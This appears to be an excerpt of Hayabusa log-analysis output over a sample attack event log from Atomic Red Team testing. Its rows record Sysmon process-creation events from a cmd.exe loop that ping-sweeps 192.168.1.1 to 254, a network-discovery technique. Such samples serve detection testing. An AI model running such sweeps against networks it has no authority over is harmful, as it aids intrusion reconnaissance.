2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
